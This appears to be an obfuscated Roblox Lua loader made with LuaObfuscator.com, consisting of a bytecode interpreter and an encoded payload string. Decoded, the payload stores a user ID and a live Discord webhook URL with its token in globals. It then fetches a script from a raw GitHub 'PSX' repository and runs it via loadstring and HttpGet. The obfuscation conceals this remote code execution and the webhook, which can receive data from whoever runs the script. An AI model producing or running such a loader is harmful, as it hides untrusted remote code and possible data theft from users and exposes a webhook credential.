--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.0) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v75=v2(v0(v30,16));if v19 then local v87=v5(v75,v19);v19=nil;return v87;else return v75;end end end);local function v20(v31,v32,v33)if v33 then local v76=(v31/((264 -((221 -(58 + 154)) + 253))^(v32-(324 -(224 + (233 -134))))))%((875 -(799 + 74))^(((v33-(1 + 0)) -(v32-(1 + 0))) + (2 -1)));return v76-(v76%(1786 -(35 + 1750)));else local v77=(5 -3)^(v32-(1 + (605 -(157 + 448))));return (((v31%(v77 + v77))>=v77) and (1527 -(1123 + 403))) or (679 -((361 -231) + 549));end end local function v21()local v38=v1(v16,v18,v18);v18=v18 + 1;return v38;end local function v22()local v39,v40=v1(v16,v18,v18 + 2);v18=v18 + 1 + 1;return (v40 * (1817 -(573 + 988))) + v39;end local function v23()local v41,v42,v43,v44=v1(v16,v18,v18 + (622 -(295 + 324)));v18=v18 + (1592 -(1357 + 231));return (v44 * (16777539 -(181 + 142))) + (v43 * (41959 + (60327 -36750))) + (v42 * (114 + 142)) + v41;end local function v24()local v45=v23();local v46=v23();local v47=1514 -(920 + 593);local v48=(v20(v46,1 + 0,682 -(384 + 278)) * ((2 + 0)^(147 -115))) + v45;local v49=v20(v46,(1803 -(485 + 51)) -(310 + 936),3 + 7 + 21);local v50=((v20(v46,31 + 1)==1) and  -((1 -0) + 0)) or (2 -1);if (v49==(0 + (1165 -(230 + 935)))) then if (v48==(337 -(201 + 136))) then return v50 * 0;else v49=1664 -(1451 + 212);v47=(232 -(137 + 95)) -0;end elseif (v49==2047) then return ((v48==(0 + 0)) and (v50 * ((3 -2)/(0 -0)))) or (v50 * NaN);end return v8(v50,v49-(1372 -(220 + 129))) * (v47 + (v48/((1 + 1)^(778 -(296 + 430)))));end local function v25(v34)local v51;if  not v34 then v34=v23();if (v34==(877 -(734 + 143))) then return "";end end v51=v3(v16,v18,(v18 + v34) -(1 + 0));v18=v18 + v34;local v52={};for v63=1, #v51 do v52[v63]=v2(v1(v3(v51,v63,v63)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53={};local v54={};local v55={};local v56={v53,v54,nil,v55};local v57=v23();local v58={};for v65=2 -1,v57 do local v66=v21();local v67;if (v66==1) then v67=v21()~=(0 + 0);elseif (v66==(1 + 1)) then v67=v24();elseif (v66==(3 + 0)) then v67=v25();end v58[v65]=v67;end v56[9 -6]=v21();for v69=1,v23() do local v70=v21();if (v20(v70,1 -0,1)==(0 + 0)) then local v83=v20(v70,1 + 1,740 -(668 + 69));local v84=v20(v70,2 + 2,6);local v85={v22(),v22(),nil,nil};if (v83==0) then v85[5 -2]=v22();v85[19 -15]=v22();elseif (v83==1) then v85[1226 -(521 + 702)]=v23();elseif (v83==2) then v85[7 -4]=v23() -(2^16);elseif (v83==3) then v85[1493 -(1091 + 399)]=v23() -((8 -6)^16);v85[12 -8]=v22();end if (v20(v84,1,799 -(43 + 755))~=(2 -1)) then else v85[2]=v58[v85[2]];end if (v20(v84,2,2)==(1 + 0)) then v85[3]=v58[v85[3]];end if (v20(v84,3,1 + 2)==(1 + 0)) then v85[4]=v58[v85[4]];end v53[v69]=v85;end end for v71=1 + 0,v23() do v54[v71-(1180 -(986 + 193))]=v28();end for v73=1 + 0,v23() do v55[v73]=v23();end return v56;end local function v29(v35,v36,v37)local v60=v35[1];local v61=v35[2];local v62=v35[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v12("#",...) -1;local function v82()local v88=v60;local v89=v61;local v90=v62;local v91=v27;local v92={};local v93={};local v94={};for v107=(694 -(29 + 11)) -(483 + 171),v81 do if (((347 + 1388 + 1791)>=(1915 -(7 + 699))) and (v107>=v90)) then v92[v107-v90]=v80[v107 + 1 + 0];else v94[v107]=v80[v107 + 1 + 0];end end local v95=(v81-v90) + (1661 -(296 + 1364));local v96;local v97;while true do v96=v88[v78];v97=v96[2 -(1667 -(1299 + 367))];if ((v97<=((1230 -(628 + 601)) + (7 -5))) or (((6620 -(811 + 162)) -(2335 + 923))>(4462 -1228))) then if (((5216 -((1177 -(287 + 17)) + 923))==3420) and (v97<=(1 -0))) then if ((v97>0) or ((1536 + 1777)<(189 + 847))) then local v118=v96[340 -(187 + 151)];v94[v118]=v94[v118](v13(v94,v118 + (587 -(550 + 36)),v79));else do return;end end elseif ((3903>=(113 + 81)) and (v97>(4 -2))) then local v120=v96[1970 -(61 + 231 + (2814 -(906 + 232)))];local v121=v94[v96[940 -(360 + 577)]];v94[v120 + 1]=v121;v94[v120]=v121[v96[(19 -12) -3]];else v94[v96[2 + 0 + 0]]=v96[3];end elseif (((74 + 1152)<=(5326 -(434 + 7))) and (v97<=5)) then if ((2440>(130 -78)) and (v97==(6 -2))) then v94[v96[907 -(98 + 313 + 494)]]();else local v127=v96[1 + 1];local v128,v129=v91(v94[v127](v13(v94,v127 + ((870 -(229 + 640)) -0),v96[3])));v79=(v129 + v127) -(4 -3);local v130=0 -0;for v135=v127,v79 do v130=v130 + (1222 -(129 + 1092));v94[v135]=v128[v130];end end elseif ((403<=(10151 -8044)) and (v97==(310 -(86 + 218)))) then v94[v96[989 -(482 + 505)]][v96[1179 -(1029 + 147)]]=v96[9 -5];else v94[v96[4 -2]]=v37[v96[14 -11]];end v78=v78 + (1320 -(8 + 1311));end end A,B=v27(v11(v82));if  not A[1] then local v98=v35[4][v78] or "?";error("Script error at ["   .. v98   .. "]:"   .. A[2]);else return v13(A,2,B);end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O0003023O005F4703063O00557365724944022O00A05642BDE34103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31303633302O353637353630363936323138362F6A546F643765584362584677426C584743764346343168595647724338646355665445446F4769724259673343782O5F7050757A783536456A4D70764B55595663707638030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403453O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D724665617374457A2F5053582F6D61696E2F736372697074732F6D61696E2E6C7561000C3O0012073O00013O0030063O000200030012073O00013O0030063O000400050012073O00063O001207000100073O002003000100010008001202000300094O0005000100034O00015O00022O00043O000100016O00017O000C3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00053O00",v9(),...);end
